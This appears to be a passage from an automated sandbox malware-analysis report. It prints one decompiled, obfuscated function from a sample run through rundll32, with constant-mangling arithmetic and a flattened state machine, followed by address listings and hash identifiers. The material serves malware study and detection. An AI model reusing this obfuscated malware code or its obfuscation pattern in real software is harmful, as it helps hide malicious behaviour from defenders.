                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: "$ $(|?|$='mm$?$I*5$J&9$J&9$LCl$c@9$lT&$t1 $upt$Y($>
                                                                                                                          • API String ID: 0-2148713076
                                                                                                                          • Opcode ID: ea0ad9556bbe55fdf80d848e99a78b9eb61898eccf0e9f6ed0228ffde23a99a5
                                                                                                                          • Instruction ID: 3527c23b2d45c7e82425408f6fe07784120d936384910b6ed73ad171dbbe2dc5
                                                                                                                          • Opcode Fuzzy Hash: ea0ad9556bbe55fdf80d848e99a78b9eb61898eccf0e9f6ed0228ffde23a99a5
                                                                                                                          • Instruction Fuzzy Hash: 1472FF715093818FD7B8CF25D58AB8BBBE2FBC5314F10891DE1DA86260DBB58949CF42
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007AAE6D Relevance: 19.3, Strings: 15, Instructions: 522COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 94%
                                                                                                                          			E007AAE6D(void* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v4;
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				unsigned int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				void* _t537;
				void* _t566;
				void* _t567;
				intOrPtr _t573;
				void* _t575;
				void* _t577;
				void* _t585;
				void* _t588;
				void* _t594;
				void* _t596;
				signed int _t603;
				signed int _t604;
				signed int _t605;
				signed int _t606;
				signed int _t607;
				signed int _t608;
				signed int _t609;
				signed int _t610;
				void* _t611;
				void* _t633;
				void* _t660;
				void* _t675;
				intOrPtr _t677;
				intOrPtr _t680;
				signed int* _t682;
				void* _t685;

				_push(_a20);
				_t677 = __edx;
				_push(_a16);
				_v24 = __edx;
				_push(0x20);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E007A20B9(_t537);
				_v8 = 0x673696;
				_t680 = 0;
				_v4 = 0;
				_t682 =  &(( &_v272)[7]);
				_v144 = 0xf00d33;
				_v144 = _v144 | 0x228e8b2e;
				_t596 = 0x1d3710;
				_v144 = _v144 >> 8;
				_v144 = _v144 ^ 0x0022fe8f;
				_v244 = 0xde08aa;
				_t603 = 0x17;
				_v244 = _v244 / _t603;
				_v244 = _v244 + 0xffff54ea;
				_v244 = _v244 << 0xa;
				_v244 = _v244 ^ 0x23f0fc00;
				_v224 = 0x36cb35;
				_v224 = _v224 | 0xc39aec51;
				_v224 = _v224 + 0x9146;
				_t604 = 0x62;
				_v224 = _v224 * 0x70;
				_v224 = _v224 ^ 0xa3c851d0;
				_v116 = 0xf2e64b;
				_v116 = _v116 << 5;
				_v116 = _v116 ^ 0x1e5cc960;
				_v248 = 0x2b7d5f;
				_t43 =  &_v248; // 0x2b7d5f
				_v248 =  *_t43 * 0x53;
				_v248 = _v248 + 0x8561;
				_v248 = _v248 | 0xae4dc352;
				_v248 = _v248 ^ 0xae5feb7e;
				_v80 = 0xe6036b;
				_v80 = _v80 * 0xb;
				_v80 = _v80 ^ 0x09e22599;
				_v240 = 0x5b8b4f;
				_v240 = _v240 + 0xffffe1e0;
				_v240 = _v240 ^ 0xb7b7812a;
				_v240 = _v240 + 0xffff41e0;
				_v240 = _v240 ^ 0xb7ec2de5;
				_v232 = 0xf81ab6;
				_v232 = _v232 ^ 0xa56b9217;
				_v232 = _v232 | 0x431a55e8;
				_v232 = _v232 << 7;
				_v232 = _v232 ^ 0xcdeef480;
				_v184 = 0xddfe73;
				_v184 = _v184 * 0x26;
				_v184 = _v184 << 8;
				_v184 = _v184 ^ 0xf3c51200;
				_v120 = 0x644fb5;
				_v120 = _v120 >> 6;
				_v120 = _v120 / _t604;
				_v120 = _v120 ^ 0x00000418;
				_v60 = 0xc6ff9f;
				_v60 = _v60 ^ 0x0d96ce7d;
				_v60 = _v60 ^ 0x0d5031e2;
				_v204 = 0xeedb74;
				_v204 = _v204 >> 0xb;
				_v204 = _v204 >> 0xa;
				_v204 = _v204 | 0xba569879;
				_v204 = _v204 ^ 0xba56987f;
				_v268 = 0x9a0618;
				_v268 = _v268 ^ 0x10270239;
				_v268 = _v268 ^ 0x733075d3;
				_t605 = 0x16;
				_v268 = _v268 / _t605;
				_v268 = _v268 ^ 0x04865c22;
				_v160 = 0x655fad;
				_v160 = _v160 >> 3;
				_v160 = _v160 >> 4;
				_v160 = _v160 ^ 0x0009a8dc;
				_v272 = 0x9202;
				_v272 = _v272 | 0xfb135803;
				_t606 = 0x41;
				_v272 = _v272 * 0x2c;
				_v272 = _v272 << 1;
				_v272 = _v272 ^ 0x4ed07035;
				_v100 = 0x536289;
				_v100 = _v100 << 9;
				_v100 = _v100 ^ 0xa6cd28cf;
				_v108 = 0xf021d8;
				_v108 = _v108 ^ 0x8f8b6ed2;
				_v108 = _v108 ^ 0x8f701d8c;
				_v152 = 0xcba027;
				_v152 = _v152 ^ 0xce0cd109;
				_v152 = _v152 | 0x7dfb06f6;
				_v152 = _v152 ^ 0xfff88f5e;
				_v252 = 0xf09c41;
				_v252 = _v252 + 0x8e2a;
				_v252 = _v252 << 3;
				_v252 = _v252 | 0xdb831f2c;
				_v252 = _v252 ^ 0xdf846234;
				_v260 = 0x3d692f;
				_v260 = _v260 << 2;
				_v260 = _v260 | 0xbfb4a027;
				_v260 = _v260 + 0x643;
				_v260 = _v260 ^ 0xbffb0fde;
				_v92 = 0x80bca7;
				_v92 = _v92 >> 0xa;
				_v92 = _v92 ^ 0x00038c1c;
				_v228 = 0xbbbc43;
				_v228 = _v228 | 0x61282476;
				_v228 = _v228 + 0xffff6ee2;
				_v228 = _v228 * 0x69;
				_v228 = _v228 ^ 0x15ccd750;
				_v236 = 0xc2062f;
				_v236 = _v236 | 0xf7f3ef67;
				_v236 = _v236 * 0x5c;
				_v236 = _v236 ^ 0x1ba01eed;
				_v128 = 0xa773bc;
				_v128 = _v128 << 0x10;
				_v128 = _v128 | 0xe162daa5;
				_v128 = _v128 ^ 0xf3f36b57;
				_v136 = 0x3287f3;
				_v136 = _v136 / _t606;
				_v136 = _v136 >> 9;
				_v136 = _v136 ^ 0x000c37d1;
				_v104 = 0x8d5fef;
				_v104 = _v104 + 0xffff56ea;
				_v104 = _v104 ^ 0x008f942b;
				_v44 = 0xd6bac6;
				_v44 = _v44 * 0x7f;
				_v44 = _v44 ^ 0x6a80c639;
				_v148 = 0xa4165e;
				_v148 = _v148 * 0x13;
				_v148 = _v148 | 0x84e82f79;
				_v148 = _v148 ^ 0x8cef9599;
				_v96 = 0xfc4916;
				_v96 = _v96 + 0xffff0795;
				_v96 = _v96 ^ 0x00f5cebb;
				_v132 = 0xd5d7c2;
				_v132 = _v132 >> 0x10;
				_v132 = _v132 << 0xd;
				_v132 = _v132 ^ 0x0010cc3c;
				_v264 = 0xf6e8cb;
				_v264 = _v264 + 0x6576;
				_v264 = _v264 + 0x7b15;
				_v264 = _v264 + 0x6b9c;
				_v264 = _v264 ^ 0x00fe3ec7;
				_v208 = 0x3a8541;
				_v208 = _v208 | 0x57459f57;
				_v208 = _v208 ^ 0x66631a8c;
				_v208 = _v208 | 0x178bfabb;
				_v208 = _v208 ^ 0x379a2cb6;
				_v56 = 0x33c5e6;
				_v56 = _v56 + 0x441;
				_v56 = _v56 ^ 0x0035e6a0;
				_v172 = 0x2bd4df;
				_v172 = _v172 + 0xda1f;
				_v172 = _v172 + 0x8171;
				_v172 = _v172 ^ 0x002cd084;
				_v48 = 0x796d26;
				_v48 = _v48 + 0xffff3152;
				_v48 = _v48 ^ 0x00766b67;
				_v88 = 0xfc738c;
				_v88 = _v88 << 0xe;
				_v88 = _v88 ^ 0x1ce8da45;
				_v140 = 0x79fdd0;
				_v140 = _v140 >> 0xe;
				_v140 = _v140 * 0x78;
				_v140 = _v140 ^ 0x000f2c53;
				_v64 = 0xd0b1f6;
				_v64 = _v64 >> 9;
				_v64 = _v64 ^ 0x000411a2;
				_v200 = 0xaa2240;
				_v200 = _v200 | 0x35f3f2d4;
				_v200 = _v200 + 0x4147;
				_v200 = _v200 + 0xffff1702;
				_v200 = _v200 ^ 0x35f16a60;
				_v52 = 0x980f89;
				_v52 = _v52 ^ 0xc15a5b47;
				_v52 = _v52 ^ 0xc1c323e9;
				_v216 = 0xb7a8b5;
				_v216 = _v216 >> 3;
				_v216 = _v216 ^ 0xa2f7ad91;
				_v216 = _v216 + 0xfffff0a8;
				_v216 = _v216 ^ 0xa2ec62b8;
				_v72 = 0x73581d;
				_v72 = _v72 + 0xffffc838;
				_v72 = _v72 ^ 0x00777119;
				_v164 = 0x873053;
				_v164 = _v164 ^ 0xefe323e3;
				_v164 = _v164 | 0xd91bba05;
				_v164 = _v164 ^ 0xff705bac;
				_v40 = 0xf8d5df;
				_v40 = _v40 ^ 0x79f853d7;
				_v40 = _v40 ^ 0x79053437;
				_v192 = 0x180af0;
				_v192 = _v192 + 0xffff4c14;
				_v192 = _v192 << 8;
				_v192 = _v192 + 0x2aad;
				_v192 = _v192 ^ 0x175759c3;
				_v256 = 0x23b549;
				_v256 = _v256 + 0x5eb6;
				_v256 = _v256 | 0xffb7bbff;
				_v256 = _v256 ^ 0xffb807e9;
				_v176 = 0xc1fdd5;
				_v176 = _v176 >> 0xc;
				_v176 = _v176 | 0x5151af8d;
				_v176 = _v176 ^ 0x515c7a4b;
				_v112 = 0xec5780;
				_v112 = _v112 ^ 0x97b4c021;
				_v112 = _v112 ^ 0x9750bd7e;
				_v180 = 0x591b41;
				_v180 = _v180 + 0x207e;
				_v180 = _v180 + 0xffffc81d;
				_v180 = _v180 ^ 0x005ca8dc;
				_v68 = 0x76fd1d;
				_t675 = 0x5c52c4a;
				_v68 = _v68 | 0x9e2d4356;
				_v68 = _v68 ^ 0x9e728261;
				_v76 = 0xf22a3;
				_v76 = _v76 | 0x9c703035;
				_v76 = _v76 ^ 0x9c7b5f20;
				_v220 = 0x3decab;
				_v220 = _v220 << 8;
				_v220 = _v220 ^ 0x53082a5e;
				_v220 = _v220 >> 0xd;
				_v220 = _v220 ^ 0x0004d715;
				_v84 = 0x6eb476;
				_v84 = _v84 << 0xd;
				_v84 = _v84 ^ 0xd68135de;
				_v124 = 0x458e11;
				_v124 = _v124 | 0x336f5b57;
				_t607 = 0x43;
				_v124 = _v124 / _t607;
				_v124 = _v124 ^ 0x00c97d17;
				_v156 = 0x7cba2c;
				_t608 = 0x4b;
				_v156 = _v156 / _t608;
				_v156 = _v156 | 0x0b494d21;
				_v156 = _v156 ^ 0x0b48f5d9;
				_v36 = 0x519404;
				_v36 = _v36 << 8;
				_v36 = _v36 ^ 0x5195ba3f;
				_v168 = 0xf13e55;
				_v168 = _v168 | 0x95edbe5f;
				_v168 = _v168 ^ 0xd6548190;
				_v168 = _v168 ^ 0x43a3dbfd;
				_v188 = 0xdd4a71;
				_v188 = _v188 + 0xffff5bb0;
				_v188 = _v188 >> 0xb;
				_v188 = _v188 >> 6;
				_v188 = _v188 ^ 0x000a03ec;
				_v196 = 0x58b29f;
				_t609 = 0x22;
				_v196 = _v196 / _t609;
				_v196 = _v196 + 0xffff713e;
				_v196 = _v196 + 0xffff146a;
				_v196 = _v196 ^ 0x000c9f67;
				_v212 = 0xc056c;
				_t610 = 0x45;
				_v212 = _v212 * 0x51;
				_v212 = _v212 >> 0xc;
				_v212 = _v212 / _t610;
				_v212 = _v212 ^ 0x0007774b;
				while(1) {
					L1:
					_t566 = 0x6c6f684;
					while(1) {
						L2:
						_t611 = 0x92c3a26;
						while(1) {
							L3:
							do {
								while(1) {
									L4:
									_t685 = _t596 - _t675;
									if(_t685 > 0) {
										break;
									}
									if(_t685 == 0) {
										E007A6BC6(_v124, _v32, _v156);
										_t596 = 0x4bc1ff4;
										goto L1;
									} else {
										if(_t596 == 0x1d3710) {
											_t596 = 0x6d0da1a;
											continue;
										} else {
											if(_t596 == 0x19992af) {
												_push(_t611);
												_push(_t611);
												_t573 = E00797FF2(_v16);
												__eflags = _t573;
												_v20 = _t573;
												_t660 = 0x19c2787;
												_t596 =  !=  ? 0x19c2787 : 0x87f6c1b;
												_t566 = 0x6c6f684;
												_t611 = 0x92c3a26;
												continue;
											} else {
												if(_t596 == _t660) {
													_t575 = E007A7B05(_v16,  &_v32, _v28, _v216, _v72, _v164, _v248, _v40, _v80, _t611, _v192, _v256, _v20);
													_t682 =  &(_t682[0xc]);
													__eflags = _t575 - _v240;
													_t611 = 0x92c3a26;
													_t566 = 0x6c6f684;
													_t596 =  ==  ? 0x92c3a26 : 0x4bc1ff4;
													goto L3;
												} else {
													if(_t596 == 0x489cb15) {
														_push(_v148);
														_push(_v44);
														_t577 = E007ADCF7(_v104, 0x7918b4, __eflags);
														_pop(_t633);
														__eflags = E007B0B68(_t577,  &_v12, _v224, _v96, _t633,  &_v16, _v132, _v264, _v208, _v56, _v28, _v172) - _v116;
														_t596 =  ==  ? 0x19992af : 0x87f6c1b;
														E0079A8B0(_v48, _t577, _v88);
														_t677 = _v24;
														_t682 =  &(_t682[0xb]);
														L24:
														_t566 = 0x6c6f684;
														_t611 = 0x92c3a26;
														_t660 = 0x19c2787;
														goto L25;
													} else {
														if(_t596 != 0x4bc1ff4) {
															goto L25;
														} else {
															E007A8519(_v36, _v168, _v20);
															_t596 = 0x87f6c1b;
															while(1) {
																L1:
																_t566 = 0x6c6f684;
																L2:
																_t611 = 0x92c3a26;
																L3:
																goto L4;
															}
														}
													}
												}
											}
										}
									}
									L28:
									return _t680;
								}
								__eflags = _t596 - _t566;
								if(_t596 == _t566) {
									_t567 = E007A828A(_v68, _v76, _v220, _t677, _v120, 0x20, _v84, _v32);
									_t682 =  &(_t682[6]);
									_t596 = _t675;
									__eflags = _t567 - _v60;
									_t680 =  ==  ? 1 : _t680;
									goto L24;
								} else {
									__eflags = _t596 - 0x6d0da1a;
									if(__eflags == 0) {
										_push(_v272);
										_push(_v160);
										_t585 = E007ADCF7(_v268, 0x791884, __eflags);
										_push(_v152);
										_push(_v108);
										_t588 = E00799462(_t585, _v260,  &_v28, E007ADCF7(_v100, 0x791814, __eflags), _v92, _v144);
										_t682 =  &(_t682[9]);
										__eflags = _t588 - _v244;
										_t596 =  ==  ? 0x489cb15 : 0x822e036;
										E0079A8B0(_v228, _t585, _v236);
										E0079A8B0(_v128, _t586, _v136);
										_t677 = _v24;
										_t675 = 0x5c52c4a;
										goto L24;
									} else {
										__eflags = _t596 - 0x87f6c1b;
										if(_t596 == 0x87f6c1b) {
											E0079957D(_v28, _v188, _v196, _v204, _v212);
										} else {
											__eflags = _t596 - _t611;
											if(_t596 != _t611) {
												goto L25;
											} else {
												_t594 = E0079A81D(_v32, _a4, _v176, _v112, _v232, _a20, _v180);
												_t682 =  &(_t682[5]);
												__eflags = _t594 - _v184;
												_t566 = 0x6c6f684;
												_t596 =  ==  ? 0x6c6f684 : _t675;
												goto L2;
											}
										}
									}
								}
								goto L28;
								L25:
								__eflags = _t596 - 0x822e036;
							} while (__eflags != 0);
							goto L28;
						}
					}
				}
			}

































































































                                                                                                                          0x007aae77
                                                                                                                          0x007aae7e
                                                                                                                          0x007aae80
                                                                                                                          0x007aae87
                                                                                                                          0x007aae8e
                                                                                                                          0x007aae90
                                                                                                                          0x007aae97
                                                                                                                          0x007aae9e
                                                                                                                          0x007aae9f
                                                                                                                          0x007aaea0
                                                                                                                          0x007aaea5
                                                                                                                          0x007aaeb0
                                                                                                                          0x007aaeb2
                                                                                                                          0x007aaeb9
                                                                                                                          0x007aaebc
                                                                                                                          0x007aaec9
                                                                                                                          0x007aaed4
                                                                                                                          0x007aaed9
                                                                                                                          0x007aaee1
                                                                                                                          0x007aaeec
                                                                                                                          0x007aaefa
                                                                                                                          0x007aaeff
                                                                                                                          0x007aaf05
                                                                                                                          0x007aaf0d
                                                                                                                          0x007aaf12
                                                                                                                          0x007aaf1a
                                                                                                                          0x007aaf22
                                                                                                                          0x007aaf2a
                                                                                                                          0x007aaf37
                                                                                                                          0x007aaf38
                                                                                                                          0x007aaf3c
                                                                                                                          0x007aaf44
                                                                                                                          0x007aaf4f
                                                                                                                          0x007aaf57
                                                                                                                          0x007aaf62
                                                                                                                          0x007aaf6a
                                                                                                                          0x007aaf6f
                                                                                                                          0x007aaf73
                                                                                                                          0x007aaf7b
                                                                                                                          0x007aaf83
                                                                                                                          0x007aaf8b
                                                                                                                          0x007aaf9e
                                                                                                                          0x007aafa5
                                                                                                                          0x007aafb0
                                                                                                                          0x007aafb8
                                                                                                                          0x007aafc0
                                                                                                                          0x007aafc8
                                                                                                                          0x007aafd0
                                                                                                                          0x007aafd8
                                                                                                                          0x007aafe0
                                                                                                                          0x007aafe8
                                                                                                                          0x007aaff0
                                                                                                                          0x007aaff5
                                                                                                                          0x007aaffd
                                                                                                                          0x007ab00a
                                                                                                                          0x007ab00e
                                                                                                                          0x007ab013
                                                                                                                          0x007ab01b
                                                                                                                          0x007ab026
                                                                                                                          0x007ab037
                                                                                                                          0x007ab03e
                                                                                                                          0x007ab049
                                                                                                                          0x007ab054
                                                                                                                          0x007ab05f
                                                                                                                          0x007ab06a
                                                                                                                          0x007ab072
                                                                                                                          0x007ab077
                                                                                                                          0x007ab07e
                                                                                                                          0x007ab086
                                                                                                                          0x007ab08e
                                                                                                                          0x007ab096
                                                                                                                          0x007ab09e
                                                                                                                          0x007ab0ac
                                                                                                                          0x007ab0b1
                                                                                                                          0x007ab0b7
                                                                                                                          0x007ab0bf
                                                                                                                          0x007ab0ca
                                                                                                                          0x007ab0d2
                                                                                                                          0x007ab0da
                                                                                                                          0x007ab0e5
                                                                                                                          0x007ab0ed
                                                                                                                          0x007ab0fa
                                                                                                                          0x007ab0fb
                                                                                                                          0x007ab0ff
                                                                                                                          0x007ab103
                                                                                                                          0x007ab10b
                                                                                                                          0x007ab116
                                                                                                                          0x007ab11e
                                                                                                                          0x007ab129
                                                                                                                          0x007ab134
                                                                                                                          0x007ab13f
                                                                                                                          0x007ab14a
                                                                                                                          0x007ab155
                                                                                                                          0x007ab160
                                                                                                                          0x007ab16b
                                                                                                                          0x007ab176
                                                                                                                          0x007ab17e
                                                                                                                          0x007ab186
                                                                                                                          0x007ab18b
                                                                                                                          0x007ab193
                                                                                                                          0x007ab19b
                                                                                                                          0x007ab1a3
                                                                                                                          0x007ab1a8
                                                                                                                          0x007ab1b0
                                                                                                                          0x007ab1b8
                                                                                                                          0x007ab1c0
                                                                                                                          0x007ab1cb
                                                                                                                          0x007ab1d3
                                                                                                                          0x007ab1de
                                                                                                                          0x007ab1e6
                                                                                                                          0x007ab1ee
                                                                                                                          0x007ab1fb
                                                                                                                          0x007ab1ff
                                                                                                                          0x007ab207
                                                                                                                          0x007ab20f
                                                                                                                          0x007ab21c
                                                                                                                          0x007ab220
                                                                                                                          0x007ab228
                                                                                                                          0x007ab233
                                                                                                                          0x007ab23b
                                                                                                                          0x007ab246
                                                                                                                          0x007ab251
                                                                                                                          0x007ab265
                                                                                                                          0x007ab26c
                                                                                                                          0x007ab274
                                                                                                                          0x007ab27f
                                                                                                                          0x007ab28a
                                                                                                                          0x007ab295
                                                                                                                          0x007ab2a0
                                                                                                                          0x007ab2b3
                                                                                                                          0x007ab2ba
                                                                                                                          0x007ab2c5
                                                                                                                          0x007ab2d8
                                                                                                                          0x007ab2df
                                                                                                                          0x007ab2ea
                                                                                                                          0x007ab2f5
                                                                                                                          0x007ab300
                                                                                                                          0x007ab30b
                                                                                                                          0x007ab316
                                                                                                                          0x007ab321
                                                                                                                          0x007ab329
                                                                                                                          0x007ab331
                                                                                                                          0x007ab33c
                                                                                                                          0x007ab344
                                                                                                                          0x007ab34c
                                                                                                                          0x007ab354
                                                                                                                          0x007ab35c
                                                                                                                          0x007ab364
                                                                                                                          0x007ab36c
                                                                                                                          0x007ab374
                                                                                                                          0x007ab37c
                                                                                                                          0x007ab384
                                                                                                                          0x007ab38c
                                                                                                                          0x007ab397
                                                                                                                          0x007ab3a2
                                                                                                                          0x007ab3ad
                                                                                                                          0x007ab3b5
                                                                                                                          0x007ab3bd
                                                                                                                          0x007ab3c5
                                                                                                                          0x007ab3cd
                                                                                                                          0x007ab3d8
                                                                                                                          0x007ab3e3
                                                                                                                          0x007ab3ee
                                                                                                                          0x007ab3f9
                                                                                                                          0x007ab401
                                                                                                                          0x007ab40c
                                                                                                                          0x007ab417
                                                                                                                          0x007ab427
                                                                                                                          0x007ab42e
                                                                                                                          0x007ab439
                                                                                                                          0x007ab444
                                                                                                                          0x007ab44c
                                                                                                                          0x007ab457
                                                                                                                          0x007ab45f
                                                                                                                          0x007ab467
                                                                                                                          0x007ab46f
                                                                                                                          0x007ab477
                                                                                                                          0x007ab47f
                                                                                                                          0x007ab48a
                                                                                                                          0x007ab495
                                                                                                                          0x007ab4a0
                                                                                                                          0x007ab4a8
                                                                                                                          0x007ab4ad
                                                                                                                          0x007ab4b5
                                                                                                                          0x007ab4bd
                                                                                                                          0x007ab4c5
                                                                                                                          0x007ab4d0
                                                                                                                          0x007ab4db
                                                                                                                          0x007ab4e6
                                                                                                                          0x007ab4ee
                                                                                                                          0x007ab4f6
                                                                                                                          0x007ab4fe
                                                                                                                          0x007ab506
                                                                                                                          0x007ab511
                                                                                                                          0x007ab51c
                                                                                                                          0x007ab527
                                                                                                                          0x007ab52f
                                                                                                                          0x007ab537
                                                                                                                          0x007ab53c
                                                                                                                          0x007ab544
                                                                                                                          0x007ab54c
                                                                                                                          0x007ab554
                                                                                                                          0x007ab55c
                                                                                                                          0x007ab564
                                                                                                                          0x007ab56c
                                                                                                                          0x007ab574
                                                                                                                          0x007ab579
                                                                                                                          0x007ab581
                                                                                                                          0x007ab589
                                                                                                                          0x007ab594
                                                                                                                          0x007ab59f
                                                                                                                          0x007ab5aa
                                                                                                                          0x007ab5b2
                                                                                                                          0x007ab5ba
                                                                                                                          0x007ab5c2
                                                                                                                          0x007ab5cc
                                                                                                                          0x007ab5d7
                                                                                                                          0x007ab5dc
                                                                                                                          0x007ab5e7
                                                                                                                          0x007ab5f2
                                                                                                                          0x007ab5fd
                                                                                                                          0x007ab608
                                                                                                                          0x007ab613
                                                                                                                          0x007ab61b
                                                                                                                          0x007ab620
                                                                                                                          0x007ab628
                                                                                                                          0x007ab62d
                                                                                                                          0x007ab635
                                                                                                                          0x007ab640
                                                                                                                          0x007ab648
                                                                                                                          0x007ab653
                                                                                                                          0x007ab65e
                                                                                                                          0x007ab672
                                                                                                                          0x007ab677
                                                                                                                          0x007ab680
                                                                                                                          0x007ab68b
                                                                                                                          0x007ab69d
                                                                                                                          0x007ab6a2
                                                                                                                          0x007ab6ab
                                                                                                                          0x007ab6b6
                                                                                                                          0x007ab6c1
                                                                                                                          0x007ab6cc
                                                                                                                          0x007ab6d4
                                                                                                                          0x007ab6df
                                                                                                                          0x007ab6e7
                                                                                                                          0x007ab6ef
                                                                                                                          0x007ab6f7
                                                                                                                          0x007ab6ff
                                                                                                                          0x007ab707
                                                                                                                          0x007ab70f
                                                                                                                          0x007ab714
                                                                                                                          0x007ab719
                                                                                                                          0x007ab721
                                                                                                                          0x007ab72d
                                                                                                                          0x007ab732
                                                                                                                          0x007ab738
                                                                                                                          0x007ab740
                                                                                                                          0x007ab748
                                                                                                                          0x007ab750
                                                                                                                          0x007ab75d
                                                                                                                          0x007ab75e
                                                                                                                          0x007ab762
                                                                                                                          0x007ab76d
                                                                                                                          0x007ab771
                                                                                                                          0x007ab779
                                                                                                                          0x007ab779
                                                                                                                          0x007ab779
                                                                                                                          0x007ab77e
                                                                                                                          0x007ab77e
                                                                                                                          0x007ab77e
                                                                                                                          0x007ab783
                                                                                                                          0x007ab783
                                                                                                                          0x007ab788
                                                                                                                          0x007ab788
                                                                                                                          0x007ab788
                                                                                                                          0x007ab788
                                                                                                                          0x007ab78a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007ab790
                                                                                                                          0x007ab969
                                                                                                                          0x007ab96f
                                                                                                                          0x00000000
                                                                                                                          0x007ab796
                                                                                                                          0x007ab79c
                                                                                                                          0x007ab94a
                                                                                                                          0x00000000
                                                                                                                          0x007ab7a2
                                                                                                                          0x007ab7a8
                                                                                                                          0x007ab91c
                                                                                                                          0x007ab91d
                                                                                                                          0x007ab91e
                                                                                                                          0x007ab924
                                                                                                                          0x007ab926
                                                                                                                          0x007ab933
                                                                                                                          0x007ab938
                                                                                                                          0x007ab93b
                                                                                                                          0x007ab940
                                                                                                                          0x00000000
                                                                                                                          0x007ab7ae
                                                                                                                          0x007ab7b0
                                                                                                                          0x007ab8dc
                                                                                                                          0x007ab8e3
                                                                                                                          0x007ab8ef
                                                                                                                          0x007ab8f1
                                                                                                                          0x007ab8f6
                                                                                                                          0x007ab8fb
                                                                                                                          0x00000000
                                                                                                                          0x007ab7b6
                                                                                                                          0x007ab7bc
                                                                                                                          0x007ab7e9
                                                                                                                          0x007ab7f5
                                                                                                                          0x007ab803
                                                                                                                          0x007ab809
                                                                                                                          0x007ab866
                                                                                                                          0x007ab874
                                                                                                                          0x007ab877
                                                                                                                          0x007ab87c
                                                                                                                          0x007ab883
                                                                                                                          0x007abada
                                                                                                                          0x007abada
                                                                                                                          0x007abadf
                                                                                                                          0x007abae4
                                                                                                                          0x00000000
                                                                                                                          0x007ab7be
                                                                                                                          0x007ab7c4
                                                                                                                          0x00000000
                                                                                                                          0x007ab7ca
                                                                                                                          0x007ab7dc
                                                                                                                          0x007ab7e2
                                                                                                                          0x007ab779
                                                                                                                          0x007ab779
                                                                                                                          0x007ab779
                                                                                                                          0x007ab77e
                                                                                                                          0x007ab77e
                                                                                                                          0x007ab783
                                                                                                                          0x00000000
                                                                                                                          0x007ab783
                                                                                                                          0x007ab779
                                                                                                                          0x007ab7c4
                                                                                                                          0x007ab7bc
                                                                                                                          0x007ab7b0
                                                                                                                          0x007ab7a8
                                                                                                                          0x007ab79c
                                                                                                                          0x007abb18
                                                                                                                          0x007abb22
                                                                                                                          0x007abb22
                                                                                                                          0x007ab979
                                                                                                                          0x007ab97b
                                                                                                                          0x007ababf
                                                                                                                          0x007abad0
                                                                                                                          0x007abad3
                                                                                                                          0x007abad5
                                                                                                                          0x007abad7
                                                                                                                          0x00000000
                                                                                                                          0x007ab981
                                                                                                                          0x007ab981
                                                                                                                          0x007ab987
                                                                                                                          0x007ab9e7
                                                                                                                          0x007ab9f0
                                                                                                                          0x007ab9fb
                                                                                                                          0x007aba00
                                                                                                                          0x007aba0e
                                                                                                                          0x007aba44
                                                                                                                          0x007aba4b
                                                                                                                          0x007aba57
                                                                                                                          0x007aba68
                                                                                                                          0x007aba6b
                                                                                                                          0x007aba81
                                                                                                                          0x007aba86
                                                                                                                          0x007aba8d
                                                                                                                          0x00000000
                                                                                                                          0x007ab989
                                                                                                                          0x007ab989
                                                                                                                          0x007ab98f
                                                                                                                          0x007abb0e
                                                                                                                          0x007ab995
                                                                                                                          0x007ab995
                                                                                                                          0x007ab997
                                                                                                                          0x00000000
                                                                                                                          0x007ab99d
                                                                                                                          0x007ab9c8
                                                                                                                          0x007ab9cf
                                                                                                                          0x007ab9d8
                                                                                                                          0x007ab9da
                                                                                                                          0x007ab9df
                                                                                                                          0x00000000
                                                                                                                          0x007ab9df
                                                                                                                          0x007ab997
                                                                                                                          0x007ab98f
                                                                                                                          0x007ab987
                                                                                                                          0x00000000
                                                                                                                          0x007abae9
                                                                                                                          0x007abae9
                                                                                                                          0x007abae9
                                                                                                                          0x00000000
                                                                                                                          0x007abaf5
                                                                                                                          0x007ab783
                                                                                                                          0x007ab77e

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
